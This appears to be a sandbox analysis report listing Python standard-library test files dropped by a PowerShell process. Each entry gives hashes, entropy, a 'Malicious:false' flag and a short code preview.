                                                                                                                                                                                                              Preview:"""..Test harness for the venv module.....Copyright (C) 2011-2012 Vinay Sajip...Licensed to the PSF under a contributor agreement..."""....import contextlib..import ensurepip..import os..import os.path..import pathlib..import re..import shutil..import struct..import subprocess..import sys..import sysconfig..import tempfile..from test.support import (captured_stdout, captured_stderr,.. skip_if_broken_multiprocessing_synchronize, verbose,.. requires_subprocess, is_emscripten, is_wasi,.. requires_venv_with_pip, TEST_HOME_DIR,.. requires_resource, copy_python_src_ignore)..from test.support.os_helper import (can_symlink, EnvironmentVarGuard, rmtree)..import unittest..import venv..from unittest.mock import patch, Mock....try:.. import ctypes..except ImportError:.. ctypes = None....# Platforms that set sys._base_executable can create venvs from within..# another venv, so no need to skip t
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1834
                                                                                                                                                                                                              Entropy (8bit):4.633624889912284
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:ym1rDijPWUFENoes9Pja+W69VbSzH26dyI4h6XtzKsA:ym1rDi5Es9Pj9JlSr2+yLUzlA
                                                                                                                                                                                                              MD5:97C70442B155CC7B232A8E16B8721399
                                                                                                                                                                                                              SHA1:530F34E520DE32088976F4E5AD1436BD67B82F8B
                                                                                                                                                                                                              SHA-256:E293B267E8766EB28C7F248C7A006B45E18606FFCA58112C7E05C29F3CF26E68
                                                                                                                                                                                                              SHA-512:ECEC85EC943F811DD2B1EA7D4857C682ECDED37104CF4EABAF14AB4531F67311889F98337AC13DBD7495732DE92565FDEAAD1D390EF494842BB525B4A38CE9B5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""This test checks for correct wait3() behavior..."""....import os..import subprocess..import sys..import unittest..from test.fork_wait import ForkWait..from test import support....if not support.has_fork_support:.. raise unittest.SkipTest("requires working os.fork()")....if not hasattr(os, 'wait3'):.. raise unittest.SkipTest("os.wait3 not defined")....class Wait3Test(ForkWait):.. def wait_impl(self, cpid, *, exitcode):.. # This many iterations can be required, since some previously run.. # tests (e.g. test_ctypes) could have spawned a lot of children.. # very quickly... for _ in support.sleeping_retry(support.SHORT_TIMEOUT):.. # wait3() shouldn't hang, but some of the buildbots seem to hang.. # in the forking tests. This is an attempt to fix the problem... spid, status, rusage = os.wait3(os.WNOHANG).. if spid == cpid:.. break.... self.assertEqual(spid, cpid).. self.assertEqu
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1205
                                                                                                                                                                                                              Entropy (8bit):4.6624974132555845
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:yk1rDiFJA4cgLcbNDIvyiEV3a+9cnFuPVig7mspe:yk1rDifPcpNkvyh3a+PVbKsA
                                                                                                                                                                                                              MD5:90AFB3F98356B671EB947555873A73AB
                                                                                                                                                                                                              SHA1:5836691BFAB1A79EFBD8A9762874F503A3C5B858
                                                                                                                                                                                                              SHA-256:FCF2E51F884E774198B0D999D4AA1CBC0A0C69658D3AA3514A3CDB81BF1E8B90
                                                                                                                                                                                                              SHA-512:52B088FE8F56F3CEEEFB521F653CE30604E893C4DF2B719DF5B8F184CED0DADB625F5BC5A7B845D5EF2B8BCCBD102ADB6ECB6E3CC5FF90D0F247E29F3D286C3B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""This test checks for correct wait4() behavior..."""....import os..import sys..import unittest..from test.fork_wait import ForkWait..from test import support....# If either of these do not exist, skip this test...if not support.has_fork_support:.. raise unittest.SkipTest("requires working os.fork()")....support.get_attribute(os, 'wait4')......class Wait4Test(ForkWait):.. def wait_impl(self, cpid, *, exitcode):.. option = os.WNOHANG.. if sys.platform.startswith('aix'):.. # Issue #11185: wait4 is broken on AIX and will always return 0.. # with WNOHANG... option = 0.. for _ in support.sleeping_retry(support.SHORT_TIMEOUT):.. # wait4() shouldn't hang, but some of the buildbots seem to hang.. # in the forking tests. This is an attempt to fix the problem... spid, status, rusage = os.wait4(cpid, option).. if spid == cpid:.. break.. self.assertEqual(spid, cpid)..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):60169
                                                                                                                                                                                                              Entropy (8bit):4.493908352932229
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:Siyl5DRdTXlrdUmqK83Cb3EYwMhNlhLlME5r7ZqJJyq1c:S1lRMmXlbpwMhNlhLltZ7ZqJJyq1c
                                                                                                                                                                                                              MD5:08E1592DE65FFD2F4A477B868A9BDE9C
                                                                                                                                                                                                              SHA1:7FD932B575D708403D2BE49497B82AFF611B6EC5
                                                                                                                                                                                                              SHA-256:5A40C62DC2A286F13F519FA63771F5F31424DF4E1944219A639A6FE1FBD9BBF0
                                                                                                                                                                                                              SHA-512:2D04A58A0D103E431D09124EC17F1455555B828093959B0ED03E3CB819EBFF058674AE8AB3B09119065E6FEFB483625D6E8A3E87614C1B83BEFE916A097C66CE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from contextlib import contextmanager..import linecache..import os..from io import StringIO..import re..import sys..import textwrap..import unittest..from test import support..from test.support import import_helper..from test.support import os_helper..from test.support import warnings_helper..from test.support.script_helper import assert_python_ok, assert_python_failure....from test.test_warnings.data import package_helper..from test.test_warnings.data import stacklevel as warning_tests....import warnings as original_warnings......py_warnings = import_helper.import_fresh_module('warnings',.. blocked=['_warnings'])..c_warnings = import_helper.import_fresh_module('warnings',.. fresh=['_warnings'])....@contextmanager..def warnings_state(module):.. """Use a specific warnings implementation in warning_tests.""".. global __warningregistry__.. for to_clear in (sys, warning_tests):.. tr
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):56
                                                                                                                                                                                                              Entropy (8bit):3.9789184179031825
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:JShh9QLM3z6RNCmMmS6n:CQLMSC96n
                                                                                                                                                                                                              MD5:FB272CE702DD000A8F7545E5C273319D
                                                                                                                                                                                                              SHA1:7038AD618ED563503D3EC9F51E346F3A0979A571
                                                                                                                                                                                                              SHA-256:DA045DC297BD06CB381D4E3A035D3C0D2BFE77E900398DB25B42DA2B9F74D815
                                                                                                                                                                                                              SHA-512:FC3DC3893C82292E3DEBA87F5D08EC8DDA2582578B84C0CEE82FE62243B831030A1D96B8FA7630FD5CFE38F6A3D17FA865BC7E4973F939252AE6D99ED135A15A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import unittest....unittest.main('test.test_warnings')..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                              Entropy (8bit):4.57717513756066
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:JSLXLoowvGVmaJ72AJo1TFhA9oG+LM2yWOlZv:wXLor8mC7JoNbIttR
                                                                                                                                                                                                              MD5:CBC563A0318086A3613C09978FA9C64B
                                                                                                                                                                                                              SHA1:055354552EC77CD9D26B9D33DBB080B14BCC390D
                                                                                                                                                                                                              SHA-256:5A165D76248BB995A8C79C73C4664926F83487C8614BC3F000D58A83608F72B0
                                                                                                                                                                                                              SHA-512:90CB9A83A56D4D21172D5BA58DAD8E95E56BB78D845143AB3B60815C0FF4134008B047E0BC34894879A21E5BB3B7FC567CE3C4CDC7A00AED4FF6E3EC731224F1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import warnings....warnings.warn('module-level warning', DeprecationWarning, stacklevel=2)..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):293
                                                                                                                                                                                                              Entropy (8bit):4.543807923124364
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:S6kgwERC9BuhrhnAuAnyK6MED6JxozoJ3fahK96JrCm2:BkgwEc9E8yKxak9WCp
                                                                                                                                                                                                              MD5:D5777C07A308F0859091734668498EA4
                                                                                                                                                                                                              SHA1:11B77FD59D5AC1E3104A4DE1FDE6DE93520404A5
                                                                                                                                                                                                              SHA-256:49226B0E22FA36391AA09CAEA107E684FA141067903B4035205C7D5C9281E96C
                                                                                                                                                                                                              SHA-512:A8C84E529836CA628BCD282DBA68FC9A0D52E7CE9A9A49B672918E4B1E9AF3F4EBD4BEE71D85354F5331E6928133FB84AD8AFF28DF1CF987947EE7A45CBD927E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# helper to the helper for testing skip_file_prefixes.....import os....package_path = os.path.dirname(__file__)....def inner_api(message, *, stacklevel, warnings_module):.. warnings_module.warn(.. message, stacklevel=stacklevel,.. skip_file_prefixes=(package_path,))..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):481
                                                                                                                                                                                                              Entropy (8bit):4.523973605549542
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:SSXFbWx1FWOg9tvmk7XLoGFRpRHOnkLU4DfIDLIKODfwom8fahIhRIDDSAv5kb7j:QTFJg9tbX/RpEAU4jI3IKOjZahI1Wah
                                                                                                                                                                                                              MD5:DEB5937643510D7A88FD2D93E096DA5A
                                                                                                                                                                                                              SHA1:F7D82E66BAEA8140864C1BA1488ECF9F7BE43365
                                                                                                                                                                                                              SHA-256:6883157258CAE497E1F41CA8E0DBAB6E518214B1AF74FDA42987E1D88983BF28
                                                                                                                                                                                                              SHA-512:2499C5EB252C5A9CB68894476C8566C8982E98C74995E0C805349A4AEDB783D13248D392F8BFEE9CC6A1D8A90B8BF383E12C21E7A3B0346E7AF96162281982CB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# Helper module for testing stacklevel and skip_file_prefixes arguments..# of warnings.warn()....import warnings..from test.test_warnings.data import package_helper....def outer(message, stacklevel=1):.. inner(message, stacklevel)....def inner(message, stacklevel=1):.. warnings.warn(message, stacklevel=stacklevel)....def package(message, *, stacklevel):.. package_helper.inner_api(message, stacklevel=stacklevel,.. warnings_module=warnings)..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8025
                                                                                                                                                                                                              Entropy (8bit):5.180445530698596
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:FWiM6xuvsvR62voJMpbJomvp4qWI90mvp4qWI9Jbv2p2gVmqeKtNVkkITuxpgMld:FZ5kJ6bbb22ctmTuxpNlhlxdIdsyy
                                                                                                                                                                                                              MD5:1E6AEC6D6FBF05800D9404F7F4087B4A
                                                                                                                                                                                                              SHA1:4FD1B72D0DA099AD8AD1C3EDF0B5FAD44468C71B
                                                                                                                                                                                                              SHA-256:8857DF1C49EAAC6AE94A8A87339B82011B89D5A035EC792A696A6D5B5502C4D0
                                                                                                                                                                                                              SHA-512:8205E99BB25E542D28D0069C7079E3F4DCDDB4F731A7CCD580CA9DB5621AB420BAA01C4FA3B78D29BDAC8C8E744AC016059BA6D43E87F42C516FB7AF6830A50F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import unittest..from test import audiotests..from test import support..import io..import struct..import sys..import wave......class WaveTest(audiotests.AudioWriteTests,.. audiotests.AudioTestsWithSourceFile):.. module = wave......class WavePCM8Test(WaveTest, unittest.TestCase):.. sndfilename = 'pluck-pcm8.wav'.. sndfilenframes = 3307.. nchannels = 2.. sampwidth = 1.. framerate = 11025.. nframes = 48.. comptype = 'NONE'.. compname = 'not compressed'.. frames = bytes.fromhex("""\.. 827F CB80 B184 0088 4B86 C883 3F81 837E 387A 3473 A96B 9A66 \.. 6D64 4662 8E60 6F60 D762 7B68 936F 5877 177B 757C 887B 5F7B \.. 917A BE7B 3C7C E67F 4F84 C389 418E D192 6E97 0296 FF94 0092 \.. C98E D28D 6F8F 4E8F 648C E38A 888A AB8B D18E 0B91 368E C48A \.. """)......class WavePCM16Test(WaveTest, unittest.TestCase):.. sndfilename = 'pluck-pcm16.wav'.. sndfilenframes = 3307.. nchannels = 2.. sampwidth = 2.. framerate = 11025..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):78348
                                                                                                                                                                                                              Entropy (8bit):4.52548463452985
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:4dIcUc5nCOnwhX/k2rWcqKe3x7elxZPAHMDxJnDCc:4dIcNCOnjK24DCc
                                                                                                                                                                                                              MD5:DB166367DF7FF363E55370A4AC89F375
                                                                                                                                                                                                              SHA1:D86185ADFB1E641FBA46EF0157D96D22858FCBAF
                                                                                                                                                                                                              SHA-256:3B4C5B27817BAB79AA0721D33F2F015026C47D57E5D3DE7016AD1247FB18382F
                                                                                                                                                                                                              SHA-512:72041D7AED7A94F03F042CB09AD9D284A30303E481EA0B5180AC3CBFA28224080D7E4564F7A0D4E4B9EF5E9C0F88CA9C6C3102C1A021C6D9EA9F23585859EB39
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import gc..import sys..import doctest..import unittest..import collections..import weakref..import operator..import contextlib..import copy..import threading..import time..import random....from test import support..from test.support import script_helper, ALWAYS_EQ..from test.support import gc_collect..from test.support import threading_helper....# Used in ReferencesTestCase.test_ref_created_during_del() ...ref_from_del = None....# Used by FinalizeTestCase as a global that may be replaced by None..# when the interpreter shuts down..._global_var = 'foobar'....class C:.. def method(self):.. pass......class Callable:.. bar = None.... def __call__(self, x):.. self.bar = x......def create_function():.. def f(): pass.. return f....def create_bound_method():.. return C().method......class Object:.. def __init__(self, arg):.. self.arg = arg.. def __repr__(self):.. return "<Object %r>" % self.arg.. def __eq__(self, other):.. if isinst
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):17178
                                                                                                                                                                                                              Entropy (8bit):4.336517330171709
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:0pHTmQToYVNbz/sp2CcEAZd8AHFasADK0EusAfv8fo7T1DsIXLUA:4iQT1Bsp+laVKfuJP1YW
                                                                                                                                                                                                              MD5:F29ECF71F271FC0D5AD2E4DFE54EF603
                                                                                                                                                                                                              SHA1:39788CD2838FF9F9E05502A7CAC109F6D0FE4246
                                                                                                                                                                                                              SHA-256:DF8B99DFCB5989E2E4F7065F286291B0621117DBCCEB77F55D930C7EE8F73C5F
                                                                                                                                                                                                              SHA-512:8F2035612062416A2AF701BFE598554D4B21CADD405B919D39C3125E51159F30704B1B5DC29D05AE08310D77BBC8C99C641538B9F9A54F2764C79613A963F1EE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import unittest..from weakref import WeakSet..import copy..import string..from collections import UserString as ustr..from collections.abc import Set, MutableSet..import gc..import contextlib..from test import support......class Foo:.. pass....class RefCycle:.. def __init__(self):.. self.cycle = self....class WeakSetSubclass(WeakSet):.. pass....class WeakSetWithSlots(WeakSet):.. __slots__ = ('x', 'y')......class TestWeakSet(unittest.TestCase):.... def setUp(self):.. # need to keep references to them.. self.items = [ustr(c) for c in ('a', 'b', 'c')].. self.items2 = [ustr(c) for c in ('x', 'y', 'z')].. self.ab_items = [ustr(c) for c in 'ab'].. self.abcde_items = [ustr(c) for c in 'abcde'].. self.def_items = [ustr(c) for c in 'def'].. self.ab_weakset = WeakSet(self.ab_items).. self.abcde_weakset = WeakSet(self.abcde_items).. self.def_weakset = WeakSet(self.def_items).. self.letters = [ustr(c) for c
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11083
                                                                                                                                                                                                              Entropy (8bit):4.545694463775872
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:kpWsV9ubilf1Bv2fzujVSXujVSvujO43u8xU4ndujVS1MNBMm7lywgvqGlwja25r:kpWe9ua1BvnXcQ0lDm+
                                                                                                                                                                                                              MD5:30751668492903979439E34FDF49BA6C
                                                                                                                                                                                                              SHA1:0755582C7D51C3F4665B1E2FC70EB7CAE1AD6BC1
                                                                                                                                                                                                              SHA-256:6800EDE29E6720E63817075B686F4A7F8C82E6898D177784DF7496B6B11B7789
                                                                                                                                                                                                              SHA-512:1F4F2C882E63894048849AD750274BFFEF48C8C9F430CDB8AA7024D88BA189DF8A2ECBA6E2F0DC427970803352070819FC61EB4C64466E21826474EEE35898DE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import webbrowser..import unittest..import os..import sys..import subprocess..from unittest import mock..from test import support..from test.support import import_helper..from test.support import os_helper....if not support.has_subprocess_support:.. raise unittest.SkipTest("test webserver requires subprocess")....URL = 'https://www.example.com'..CMD_NAME = 'test'......class PopenMock(mock.MagicMock):.... def poll(self):.. return 0.... def wait(self, seconds=None):.. return 0......class CommandTestMixin:.... def _test(self, meth, *, args=[URL], kw={}, options, arguments):.. """Given a web browser instance method name along with arguments and.. keywords for same (which defaults to the single argument URL), creates.. a browser instance from the class pointed to by self.browser, calls the.. indicated instance method with the indicated arguments, and compares.. the resulting options and arguments passed to Popen by the browser..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7053
                                                                                                                                                                                                              Entropy (8bit):4.654208074381173
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:5TwAwAzbKLQnXfTmE1mESPMPtUdM3TmQEA:5ThwIbKLQnbJsi
                                                                                                                                                                                                              MD5:96D323498E99B0B4EDB67E158AD3FDFD
                                                                                                                                                                                                              SHA1:C6AF68D4123BBC3BB2EC962C88E56EDF178A911F
                                                                                                                                                                                                              SHA-256:C881E493E741B7EB17E354DEC14662F4E8AF0F7E67F95C7CF075B760AADA806E
                                                                                                                                                                                                              SHA-512:82F1A6C78849BEDE4837276658EFA5D45A063AC829A48713F6D0040C47F6391DE7FF6939D73DA21AB9E29E370DCD9BB05D9998326BD44DD0E1EB1F489E290DCB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:'''Tests for WindowsConsoleIO..'''....import io..import os..import sys..import tempfile..import unittest..from test.support import os_helper, requires_resource....if sys.platform != 'win32':.. raise unittest.SkipTest("test only relevant on win32")....from _testconsole import write_input....ConIO = io._WindowsConsoleIO....class WindowsConsoleIOTests(unittest.TestCase):.. def test_abc(self):.. self.assertTrue(issubclass(ConIO, io.RawIOBase)).. self.assertFalse(issubclass(ConIO, io.BufferedIOBase)).. self.assertFalse(issubclass(ConIO, io.TextIOBase)).... def test_open_fd(self):.. self.assertRaisesRegex(ValueError,.. "negative file descriptor", ConIO, -1).... with tempfile.TemporaryFile() as tmpfile:.. fd = tmpfile.fileno().. # Windows 10: "Cannot open non-console file".. # Earlier: "Cannot open console output buffer for reading".. self.assertRaisesRegex(ValueError,.. "Cannot o
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):23543
                                                                                                                                                                                                              Entropy (8bit):4.689021728367339
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:uMb0ObtjZjYY8M6FtJU2N0Y/bouSALihHeWpU:uMb0ObF666JU2N0wJLiHeWpU
                                                                                                                                                                                                              MD5:928484B67EF84B9A813C65B0C92A92EB
                                                                                                                                                                                                              SHA1:3F058313B7CD27217428FAC2526199396CD3AB70
                                                                                                                                                                                                              SHA-256:C6426767DC9974722AB67715894CFB606DC6CBE30A0728804EC6803E962DFE2E
                                                                                                                                                                                                              SHA-512:E294982C226CC9D07619A19801374464EA78D31A4A69616E2EF3A710ACF6A9DBE0A09C4F5B43BE73BD569139A1668F132204EBC50F4A5F3E002C5BB11A0EBE27
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# Test the windows specific win32reg module...# Only win32reg functions not hit here: FlushKey, LoadKey and SaveKey....import gc..import os, sys, errno..import threading..import unittest..from platform import machine, win32_edition..from test.support import cpython_only, import_helper....# Do this first so test will be skipped if module doesn't exist..import_helper.import_module('winreg', required_on=['win'])..# Now import everything..from winreg import *....try:.. REMOTE_NAME = sys.argv[sys.argv.index("--remote")+1]..except (IndexError, ValueError):.. REMOTE_NAME = None....# tuple of (major, minor)..WIN_VER = sys.getwindowsversion()[:2]..# Some tests should only run on 64-bit architectures where WOW64 will be...WIN64_MACHINE = True if machine() == "AMD64" else False....# Starting with Windows 7 and Windows Server 2008 R2, WOW64 no longer uses..# registry reflection and formerly reflected keys are shared instead...# Windows 7 and Windows Server 2008 R2 are version 6.1. Due to thi
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5616
                                                                                                                                                                                                              Entropy (8bit):4.878060330809044
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:MrxWrhESVw90TBX4Y6qi0cPi7Tn404td474A4ea4h42ZBxjoxcJcsLgA:MrKhE79SBIY6qi0cPmT4XUUrW+gThK5A
                                                                                                                                                                                                              MD5:BE5A335624145CAF1C5D53EB3007D37F
                                                                                                                                                                                                              SHA1:8694B6539304A348B0BE5857894103E0993A0859
                                                                                                                                                                                                              SHA-256:DA975FFA4A77466F2CA0EE25FCB5F67B4C77BECF33B2568C2017B9BB91ABCCDB
                                                                                                                                                                                                              SHA-512:21134AF3B002F79DF606A67047EC8D85FEBBA44146D5317012F707D73607D15A525D5EED4D309AD78164DC93F747066114938FF30E3D1CB86B1F96FF79875477
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# Ridiculously simple test of the winsound module for Windows.....import functools..import pathlib..import time..import unittest....from test import support..from test.support import import_helper......support.requires('audio')..winsound = import_helper.import_module('winsound')......# Unless we actually have an ear in the room, we have no idea whether a sound..# actually plays, and it's incredibly flaky trying to figure out if a sound..# even *should* play. Instead of guessing, just call the function and assume..# it either passed or raised the RuntimeError we expect in case of failure...def sound_func(func):.. @functools.wraps(func).. def wrapper(*args, **kwargs):.. try:.. ret = func(*args, **kwargs).. except RuntimeError as e:.. if support.verbose:.. print(func.__name__, 'failed:', e).. else:.. if support.verbose:.. print(func.__name__, 'returned').. return ret.. return wrapper..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):27395
                                                                                                                                                                                                              Entropy (8bit):4.520604180301441
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:HMnfkpksUVycHjOmCYVnj3CUIoMRK4MTNFjjRT:HMnfkpksUVyYjOX6nJ4MTNFjjRT
                                                                                                                                                                                                              MD5:C11E6EFCBB04BC1352EBA45E21D1F9E1
                                                                                                                                                                                                              SHA1:506B82E3BFAEB335B570895D2D99D6EF8CCF8D0B
                                                                                                                                                                                                              SHA-256:6A85E7F8A9361E6EEC92BEECA174E82F4785B0FE28CDC5D57202433FFAD08F15
                                                                                                                                                                                                              SHA-512:FBAD95832306C4689D28E4266C466EA40CAECB0276F7B03EB86CAD9B4BA70B33ABBA3840430365ED251125B3B90B8374891E79E7D7A93C65D3054541858CF70D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Unit tests for the with statement specified in PEP 343."""......__author__ = "Mike Bland"..__email__ = "mbland at acm dot org"....import sys..import unittest..from collections import deque..from contextlib import _GeneratorContextManager, contextmanager, nullcontext......class MockContextManager(_GeneratorContextManager):.. def __init__(self, *args):.. super().__init__(*args).. self.enter_called = False.. self.exit_called = False.. self.exit_args = None.... def __enter__(self):.. self.enter_called = True.. return _GeneratorContextManager.__enter__(self).... def __exit__(self, type, value, traceback):.. self.exit_called = True.. self.exit_args = (type, value, traceback).. return _GeneratorContextManager.__exit__(self, type,.. value, traceback)......def mock_contextmanager(func):.. def helper(*args, **kwds):.. return MockContextManager(func, args, kwds)..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3035
                                                                                                                                                                                                              Entropy (8bit):4.72619719073847
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:SjFE9rb6R3+yIWaU6uZai9d+CF+OUnh2pQNGehgTalgneSgzq9gTalgbnpwRgC:KFYrbO3ZfVMCFRUnh2pQB0KqmnpC
                                                                                                                                                                                                              MD5:211D86CFB7B17764A0E890B90A905936
                                                                                                                                                                                                              SHA1:CF287D7AD4CA8D02C5A44FB836DCC43B86562EE8
                                                                                                                                                                                                              SHA-256:C30EE47A7735146FA7E43C9721333642AAE15D7E6368789D95F1FFA94CCF706A
                                                                                                                                                                                                              SHA-512:4C77A26CAADDC4C41976C1DE196D4C59AFD9ACED33EAFA9E7C777B1B9D27E6179F822D173327FDC2C36C12F6BC11737DDC6C174BD67D5751B542B6B99F0D9094
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# Test the internal _wmi module on Windows..# This is used by the platform module, and potentially others....import unittest..from test.support import import_helper, requires_resource......# Do this first so test will be skipped if module doesn't exist.._wmi = import_helper.import_module('_wmi', required_on=['win'])......class WmiTests(unittest.TestCase):.. def test_wmi_query_os_version(self):.. r = _wmi.exec_query("SELECT Version FROM Win32_OperatingSystem").split("\0").. self.assertEqual(1, len(r)).. k, eq, v = r[0].partition("=").. self.assertEqual("=", eq, r[0]).. self.assertEqual("Version", k, r[0]).. # Best we can check for the version is that it's digits, dot, digits, anything.. # Otherwise, we are likely checking the result of the query against itself.. self.assertRegex(v, r"\d+\.\d+.+$", r[0]).... def test_wmi_query_repeated(self):.. # Repeated queries should not break.. for _ in range(10):..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):30871
                                                                                                                                                                                                              Entropy (8bit):4.817483847913663
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:8+gZEPTm0TpTKiTHTZlTjxKTlG9b1qyYmta5D9VaO/+kp:8+gZEbbVKOzZxjxKTlG9bfvaD9Vpp
                                                                                                                                                                                                              MD5:92F4900C15584D55342EB53F37659DEE
                                                                                                                                                                                                              SHA1:0D023672404F2F906B3102165C2CBCBDDBFB82A7
                                                                                                                                                                                                              SHA-256:A67CD07D8EC9F89F12813A7355986531E39EDBAC44428F74BD61B1EF874BC818
                                                                                                                                                                                                              SHA-512:0F03A61A43F62193B8BC85FFE39FA878E199FE9FADAEBFD6D48CB113E92EDA272CFE97ECD4E027D0C4C234AE04F96F2511DC52AB0F039F5728B590E5DC7EFB5A
                                                                                                                                                                                                              Malicious:false
